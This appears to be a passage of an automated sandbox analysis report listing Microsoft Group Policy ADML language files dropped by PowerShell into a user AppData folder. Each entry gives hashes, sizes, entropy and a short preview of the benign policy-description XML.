Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TouchInput">Touch Input</string>.. <string id="TouchInputOff">Turn off Tablet PC touch input</string>.. <string id="TouchInputOff_Help">Turn off Tablet PC touch input....Turns off touch input, which allows the user to interact with their computer using their finger.....If you enable this setting, the user will not be able to produce input with touch. They will not be able to use touch input or touch gestures such as tap and double tap, the touch pointer, and other touch-specific features.....If you disabl

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\UserProfiles.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (658), with CRLF line terminators
Category:	dropped
Size (bytes):	43896
Entropy (8bit):	4.667568456685799
Encrypted:	false
SSDEEP:	768:FkIqBn46Y+xwhTjlMIbNzjWtqqnOTLTn8Gu/:Fkze+xwhTjlPWttSvnnA
MD5:	5F55E2D434E9BE9D2AC4108C2AE42106
SHA1:	6785C7EF4F183004F4F9CCF9D383DABF8914BFF3
SHA-256:	D9459CCAD7106CC5A8665076C9D74C39D211D11A6F33870385528389826264D9
SHA-512:	6109AEFDA8D656767F0A00C75F2241A454D85AA51B36338E1F5103A96BD32BB5B6571183132FD2468AE74A298623E7000A6F1C94F5760E55C92EB6DD01537BB0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AddAdminGroupToRUP">Add the Administrators security group to roaming user profiles</string>.. <string id="AddAdminGroupToRUP_Help">This policy setting adds the Administrator security group to the roaming user profile share.....Once an administrator has configured a user's roaming profile, the profile will be created at the user's next login. The profile is created at the location that is specified by the administrator.....For the Windows XP Professional and Windows 2000 Professional operating systems, the defa

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\VolumeEncryption.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (1087), with CRLF line terminators
Category:	dropped
Size (bytes):	97809
Entropy (8bit):	4.865980267514194
Encrypted:	false
SSDEEP:	1536:yF3hamxu6iF2VflT2VfD7oaV6Z32VfDt2Kn+DZcZy:NYTNR96Zy
MD5:	11CDF6A637203126A5F35982F599C1AF
SHA1:	6E92BB3C55BAD050302EAFD9C7A722798B9FC0F1
SHA-256:	CC9BCBDB2FBBD9B3A529CFEFAEE37231BE9D712840E0FBD456D8AF9947E15F14
SHA-512:	AB39EA7CE5C379C90D4BAF6F4C506CDBDA17F29D75050CA10E713275EFAB609E0FBCD2B08E3D80E3F8EDCB410192B96C272789D10C1B71D9698B58BD75C6FE4A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDirectoryBackup_Help">This policy setting allows you to manage the Active Directory Domain Services (AD DS) backup of BitLocker Drive Encryption recovery information. This provides an administrative method of recovering data encrypted by BitLocker to prevent data loss due to lack of key information. This policy setting is only applicable to computers running Windows Server 2008 or Windows Vista.....If you enable this policy setting, BitLocker recovery information is automatically and silently backed up to AD

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\W32Time.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (721), with CRLF line terminators
Category:	dropped
Size (bytes):	16499
Entropy (8bit):	4.944041721958569
Encrypted:	false
SSDEEP:	384:A/mnOQzg68GwhRsw6uHGtY2PQJyGizYTO2jF4TTt:JnORtuYTOmF4TTt
MD5:	7FAF3A73C8DBAE90E511742BBB51AADD
SHA1:	D651E3B70B5C8A6CE7FDCD92D15189CB6880A361
SHA-256:	B62D8648EB65A947AE783F67A0E3F2276545DF1CD265CF4AA513DC53DF6882E0
SHA-512:	74A1533992353ADFD8E33365AE91DC7CF914A488D5E406D537344FE6F3565AB669DF221082E96DE47E172A4916B695B27499E129BAA9C8FB9B51C9EB264196BD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="W32TIME_CONFIG_EXPLAIN">This policy setting allows you to specify Clock discipline and General values for the Windows Time service (W32time) for domain controllers including RODCs.....If you enable this policy setting, you can specify the following Clock discipline, General and RODC parameters for this service.....If you disable or do not configure this policy setting, Windows Time service uses the defaults of each of the following parameters.....Several of the following values are scalar, which means that they on

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WCM.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (583), with CRLF line terminators
Category:	dropped
Size (bytes):	5728
Entropy (8bit):	4.528195330790601
Encrypted:	false
SSDEEP:	96:LeD5pmuOd2s+XGRFUv41c845cJ6RygNEfHZbWvK64kqo5UidD/PPTifE8h2WNOFV:EdOd2/XGbbqcSlNEf5CvWo5Ui9/n+MGW
MD5:	7D5B3A4F151213CB0EFDACFA335A6AA3
SHA1:	F36C9F3F58804077CE1AB9D41B29073D1E988752
SHA-256:	5EC9152E44738D44848AB532D269EC0D51612FD60B5FA8A7A3D53DC0395164A2
SHA-512:	C4DBFA582B75C32016FFE6AF8B5BEBFE2C9DBEB3A80BF1F8319CB1EAF76B043632E0E7A043457263EC41448A74C411920121EB194D04180E712C347F15F27EA7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Connection Manager Group Policy Settings</displayName>.. <description>Windows Connection Manager Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WCM_Category">Windows Connection Manager</string>.. <string id="WCM_BlockNonDomain">Prohibit connection to non-domain networks when connected to domain authenticated network</string>.. <string id="WCM_BlockNonDomain_Help">This policy setting prevents computers from connecting to both a domain based network and a non-domain based network at the same time... .. If this policy setting is enabled, the computer responds to automatic and manual networ

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WDI.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (513), with CRLF line terminators
Category:	dropped
Size (bytes):	3666
Entropy (8bit):	4.76342138021097
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKMs4jm9y1YJWl5p0BsYlvPB9ZMKFdL5dbsEIqALJ/PUq1XWgV:LeD5pmYs4jkWlnCsKPB9ZRJHYV/PptV
MD5:	3C7A58453A2A54C65A82137819FCBFA2
SHA1:	635B1128546EA8A86DD984ADDE64BA1D0B8961A0
SHA-256:	4A49D6F192FF5E859FE003DB2584049D5F54615F80E5B977156F7D51F4752105
SHA-512:	DD3B7A0BE79E23F4B477080468B74BDA4D23730A2177DC4A092893718B2F0C2192AEB2885C60E0F2DF48AD0AA65E55535A61251325C1DFBB74844C867573139A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiDpsScenarioDataSizeLimitPolicy">Diagnostics: Configure scenario retention</string>.. <string id="WdiDpsScenarioDataSizeLimitPolicyExplain">This policy setting determines the data retention limit for Diagnostic Policy Service (DPS) scenario data.....If you enable this policy setting, you must enter the maximum size of scenario data that should be retained in megabytes. Detailed troubleshooting data related to scenarios will be retained until this limit is reached.....If you disable or do not configure this p

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WPN.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
Category:	dropped
Size (bytes):	7410
Entropy (8bit):	4.5477372257913125
Encrypted:	false
SSDEEP:	96:LeD5pmIA4ik0bcMuEB4odMuQ0AuwsurKK4GA1TunDzDsZwuE7MteWQPyqyjV:EQkdMuEWCMuesurKKHKTuAwuE7MIWKxA
MD5:	77C2A2EB749EBCA17124B632612CE191
SHA1:	3B7F2E4594DB1D354755184C0127825F6A81E7D5
SHA-256:	058509712BF20A49CC276BDF4AB6B0CCDC3550501DA0F2C4529E234E9AAE6068
SHA-512:	6FC63B4998C6E746D82F5680FB67BE2CEADC227EFFE5A07DFF1E94E69A1711AD207EA4481DF25E722D57BBBCFD14F4C395C086D06E3071D1237099C8518AB313
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NotificationsCategory">Notifications</string>.. <string id="NoTileNotification">Turn off tile notifications</string>.. <string id="NoTileNotificationExplain">.. This policy setting turns off tile notifications..... If you enable this policy setting, applications and system features will not be able to update their tiles and tile badges in the Start screen..... If you disable or do not configure this policy setting, tile and badge notifications are enabled and can be turned off b

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WinCal.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1085
Entropy (8bit):	4.9989682223802285
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yIjoCg/IPGISwIIPFV:cgeD5x8gm8fK/DPlEIPFV
MD5:	8D40CA00FF9CB0AEABED1F9B98D06B2B
SHA1:	9B8819C7D0DB7C760990DE409BDE733A8BA179CC
SHA-256:	5D5FD8758FFCD1BCB7A28025E05D5749AC4B691ADF0B9E2589C096B75E5DC5C4
SHA-512:	4978350FE3A30EA539B38C0322D00F6853CE1227FB15859FD98BC8A655B4949E8B633622D41AC22552280624BE5E017A4566198BC6FF896A25A8BA83D8825AA8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TurnOffWinCal">Turn off Windows Calendar</string>.. <string id="TurnOffWinCal_Explain">Windows Calendar is a feature that allows users to manage appointments and tasks by creating personal calendars, publishing them, and subscribing to other users calendars.....If you enable this setting, Windows Calendar will be turned off.....If you disable or do not configure this setting, Windows Calendar will be turned on.....The default is for Windows Calendar to be turned on.</string>.. <string id="WinCal">Windows

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WinInit.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2477
Entropy (8bit):	4.814838125716894
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yaGryIBOKOxOZghgBMZvGM2MWIxTgbaoR01bF2jV:cgeD5x8gm8fKeBOVx2ghUD92YN7V
MD5:	0CDEAB62595877530194386C7F6A6661
SHA1:	1F0AA6E09C0C4123912F41639AB16534669D374E
SHA-256:	00FF3D345DDD3586734720DDDE1E688A31AC0CA468ED85B8A322CBCFD4BB03EE
SHA-512:	C1CE4AB1F1878E7DFE16DBC6065E9145EEB23914208F5C0A815D4DC18B4BFD5DF5BB588E6042F80E1EAB56001F5BFD8EF5F1CA061EF43D1440B3215FCE774B91
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableNamedPipeShutdownPolicyDescription">Turn off legacy remote shutdown interface</string>.. <string id="DisableNamedPipeShutdownPolicyDescription_Help">This policy setting controls the legacy remote shutdown interface (named pipe). The named pipe remote shutdown interface is needed in order to shutdown this system from a remote Windows XP or Windows Server 2003 system.....If you enable this policy setting, the system does not create the named pipe remote shutdown interface.....If you disable or do not conf

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WinLogon.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (530), with CRLF line terminators
Category:	dropped
Size (bytes):	8978
Entropy (8bit):	4.691590472306916
Encrypted:	false
SSDEEP:	192:Ehq33S6hDBnHY0+4F1QvJNF1QmQcZNDoFYuu/+AsdegiYKECaVBMi8JfRs:mqBFUhYXZMi8c
MD5:	AD266AC436809BBDC0A19A05E80904A8
SHA1:	9515ABF43047427E1A13E2930C9AB6C171C6EA0B
SHA-256:	0E5BA42E689B38880E0DCB236FC16C4EB9E1809DC94CFCF5AA511B79FAFBA26F
SHA-512:	2B27F8DA69CDFB4423C954DC402FD7234C9F462E849F2687FFFD9E00CDEF23FF5EFA8D7A59E7640BAFC96633C0929A0136F5DCED52CA1ECD8ED2C15FBA8D1DC7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisplayLastLogonInfoDescription">Display information about previous logons during user logon</string>.. <string id="DisplayLastLogonInfoDescription_Help">This policy setting controls whether or not the system displays information about previous logons and logon failures to the user.....For local user accounts and domain user accounts in domains of at least a Windows Server 2008 functional level, if you enable this setting, a message appears after the user logs on that displays the date and time of the last suc

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Windows.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	7341
Entropy (8bit):	5.050859952546844
Encrypted:	false
SSDEEP:	192:7t/qF4BH/2pten9EVDEVhclKekhlJDnfQn:8bAeYlJDnU
MD5:	091AE0EC426BBE821C7C4A313FA3E5A5
SHA1:	013191A0FEF6551C71BCBD5823D0DC6C02867906
SHA-256:	FD871C109B4BE893167D85E6C37792B70E2F251DDB9370D039161E3FE735BDCC
SHA-512:	9971AB9D1272594663E6BDEC25110E6116B39C5101C70177ED846E3D4D78A8FE8F23326D559B0D420404D1ADE94AD93FC774000A6B1B372583D54863F5B34A72
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Vista base categories and supported component definitions</displayName>.. <description>This file contains all the base categories and supported component definitions used by operating system components.</description>.... <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsVistaOrServer2008Only">Windows Server 2008 and Windows Vista</string>.. <string id="SUPPORTED_AllowWebPrinting">Windows 2000 or later, running IIS. Not supported on Windows Server 2003.</string>.. <string id="SUPPORTED_IE6SP1">At least Internet Explorer 6 Service Pack 1</string>.. <string id="SUPPORTED_Win2k">At least Windows 2000</string>.. <s

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsAnytimeUpgrade.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1059
Entropy (8bit):	5.0665762842091135
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yFvHzJCFEpFlurFV:cgeD5x8gm8fKeLoFalurFV
MD5:	42A08790F9D22D63FC6D832BC97CAB7C
SHA1:	1EAADF4115A41993AEA94D99AD23034C88DA243B
SHA-256:	38866CDAD4284842C711350A8E5E9A0E3743B21BB66F0D849073FD73D4137A0F
SHA-512:	4DC9EC52BE0CA470CCAE39A62E6674610151BDA10395874548A47036EDF72C861A016D66B3ED38A1892BCB17B3A67A3371B6D29C7A1B37B76321064B6A81288D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WAU">Add features to Windows 8.1</string>.. <string id="WAU_Help">Contains settings to control the behavior of the Add features to Windows 8.1 wizard.</string>.. <string id="DisableWAU">Prevent the wizard from running.</string>.. <string id="DisableWAU_Help">By default, Add features to Windows 8.1 is available for all administrators. ....If you enable this policy setting, the wizard will not run.....If you disable this policy setting or set it to Not Configured, the wizard will run.</string>.. </s

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsBackup.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3483
Entropy (8bit):	4.819976484985464
Encrypted:	false
SSDEEP:	48:cgeD5J8FGj3Hzx+h1Pi1DjP3xYPXUrP/bFV:LeD5OuLFV
MD5:	8015A772382BE975C6E6145B1A25F71A
SHA1:	4B8773056C6F34C2BF2463E2FC9C346BA73BB221
SHA-256:	33A81CBC22929DB64640E0DA5046F30634F5B9DC9271F9601CA7ABCBC0E656D7
SHA-512:	61C05CEEC442EB66BFFC11ED4D303D15A15E5D385B62D7118EC3354FB07CDE6EB95A6A98D3828BB213122C98606333B7A7EF72B4719B79D3B07175D50FF3DA8D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Backup</displayName>.. <description>Windows Backup</description>.. <resources>.. <stringTable>.. <string id="AllowOnlySystemBackup">Allow only system backup</string>.. <string id="AllowOnlySystemBackupExplain">This policy setting allows you to manage whether backups of only system volumes is allowed or both OS and data volumes can be backed up.....If you enable this policy setting, machine administrator/backup operator can backup only volumes hosting OS components and no data only volumes can be backed up.If you disable or do not configure this policy setting, backups can include both system or data volumes.</string>.. <string i

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsColorSystem.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1427
Entropy (8bit):	4.84683359240417
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61ymLYLQqTKjUW3gHU5Xyp7lvW8/pV0FV:cgeD5x8gm8fKuTcgeiTD0FV
MD5:	39EDDC1EBA0C76841D195659381A44B5
SHA1:	3ED545728FAE06E6C94B15B443EE3CCBFED6B902
SHA-256:	DFF8FE621764236769B2C17AEC64C4A8496DD967CF2D3EB9E2F8103BD503E12C
SHA-512:	7A44DF7BF6E10E7985CD401D69C2361C888FF5D8CCE151C50DA871AD5F680A4EE5ED1941958014BD91FD45E0B5E6C84B6BD77467D9B6D1F197A2BA8096D17EA9
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ProhibitChangingInstalledProfileList">Prohibit installing or uninstalling color profiles</string>.. <string id="ProhibitChangingInstalledProfileListExplain">This policy setting affects the ability of users to install or uninstall color profiles.....If you enable this policy setting, users cannot install new color profiles or uninstall previously installed color profiles.....If you disable or do not configure this policy setting, all users can install new color profiles. Standard users can uninstall color profi

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsConnectNow.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
Category:	dropped
Size (bytes):	3410
Entropy (8bit):	5.029780460475183
Encrypted:	false
SSDEEP:	96:LeD5pmCEXQ8gCBmXrmlBGx9HuT5nF2Uxt8IoV:EbEXQ8gCBmXrmMuT5F2Uxt8F
MD5:	7FDE7C285C5BFBCD2E562DB3F37096EC
SHA1:	FE32189EE6438FF319BDD9C79FFFDEEF158BA977
SHA-256:	1471ACA2B4BCD0A4D5BF43330741CC0314A243DE0757DB0383452A7C473E1644
SHA-512:	9C1C72D90D5F03399C6AB11029EEE9EB13B897723ED636094AE1565F5E55D4BF9F468A4F93E6BC45C5FA1C135DA0351E5EE2C3372A12C558607230ECC65E78B6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WCN_Category">Windows Connect Now</string>.. <string id="WCN_DisableWcnUi">Prohibit access of the Windows Connect Now wizards</string>.. <string id="WCN_DisableWcnUi_Help">This policy setting prohibits access to Windows Connect Now (WCN) wizards. ....If you enable this policy setting, the wizards are turned off and users have no access to any of the wizard tasks. All the configuration related tasks, including "Set up a wireless router or access point" and "Add a wireless device" are disabled. ....If you d

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsDefender.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 text, with very long lines (733), with CRLF line terminators
Category:	dropped
Size (bytes):	75437
Entropy (8bit):	4.739020696864297
Encrypted:	false
SSDEEP:	768:UtkTlKxkN82stKz65oqibddrfPaeq6wEqx2xkN8AAS2VHU/2:UWBD82noaTrfPae62xy8AASD2
MD5:	F1A80F0C326A0FDE6917DD3AD03C6561
SHA1:	C014384966DEF2C68671E9BED95371447D96FA77
SHA-256:	03DD8B1E813023915A4F0143749E9CE752F81EDB973D4071CA522A03028CE619
SHA-512:	5FC276B7F1A8D8C3AE163910007405CB38108F5728EE9A2FAE74DD134FCDF3972BA4D46905650C252C96A18BFB781564A626621DAD7F9AFF49BC9D6751399A16
Malicious:	false
Preview:	<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AntiSpyware">Windows Defender</string>.. <string id="Exclusions">Exclusions</string>.. <string id="NetworkRealtimeInspection">Network Inspection System</string>.. <string id="NetworkRealtimeInspection_Exclusions">Network Inspection System Exclusions</string>.. <string id="Quarantine">Quarantine</string>.. <string id="RealtimeProtection">Real-time Protection</string>.. <string id="Remediation">Remediation</string>.. <string id="Reporting">Reporting</string>.. <string id="Scan">Scan</string>.. <string id="SignatureUpdate">Signature Updates</string>..

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsExplorer.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (989), with CRLF line terminators
Category:	dropped
Size (bytes):	57954
Entropy (8bit):	4.692320082638433
Encrypted:	false
SSDEEP:	768:hctuJMsDha+k7JlgKVrag8E09FlZ9mzQNkQZZZaQZQP2BQvYIsyYiq:hpg8TluE5BQv5syYiq
MD5:	C1FBABFE3BC28D72CEB06DABDD8DCDDA
SHA1:	74660612AAE1056EBDB1DCBBE4D93AA163558AB4
SHA-256:	D350F2161317CCA32AD7BB4D6CF369F3AA81467122855F9FA8B8B0BA15F14893
SHA-512:	EC3B8C1449B89C5981CEC9D3F2072AD66D2C92FAC2336365C341959FF9AB60B60083C39D1413217B4F07FFEE3389B4C6DCFFF5B7A7F38EE781A934212F5A1A66
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ABCDOnly">Restrict A, B, C and D drives only</string>.. <string id="ABConly">Restrict A, B and C drives only</string>.. <string id="ABOnly">Restrict A and B drives only</string>.. <string id="ALLDrives">Restrict all drives</string>.. <string id="ClassicShell">Turn on Classic Shell</string>.. <string id="ClassicShell_Help">This setting allows an administrator to revert specific Windows Shell behavior to classic Shell behavior.....If you enable this setting, users cannot configure their syste

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsFileProtection.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4257
Entropy (8bit):	4.850396400130338
Encrypted:	false
SSDEEP:	96:LeD5pm1WXTuo/WBDr5RCutnwFBTb8WEMa3GUiKV:EQVJtwV3Zahi+
MD5:	2652912F37E3671937BB50F97C05FADF
SHA1:	F1B96B528263077B0DD66B9C004E923EAA71C6E8
SHA-256:	D7293FB074E7098858E2090DB60C7E3A8DC96FA062FACBABDA34AF48C57A4A8A
SHA-512:	F462F5F732207EFB517FAB537A556A80BD8BFE80302EBAF9436E34B3788ADF2907F53D08AF871D57EDD03D2C457ECC709320F7DC7F0D33F68F4E2254C111A9AF
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WFP">Windows File Protection</string>.. <string id="WFPDllCacheDir">Specify Windows File Protection cache location</string>.. <string id="WFPDllCacheDir_Help">This policy setting specifies an alternate location for the Windows File Protection cache.....If you enable this policy setting, enter the fully qualified local path to the new location in the "Cache file path" box.....If you disable this setting or do not configure it, the Windows File Protection cache is located in the %Systemroot%\System32\Dllcac

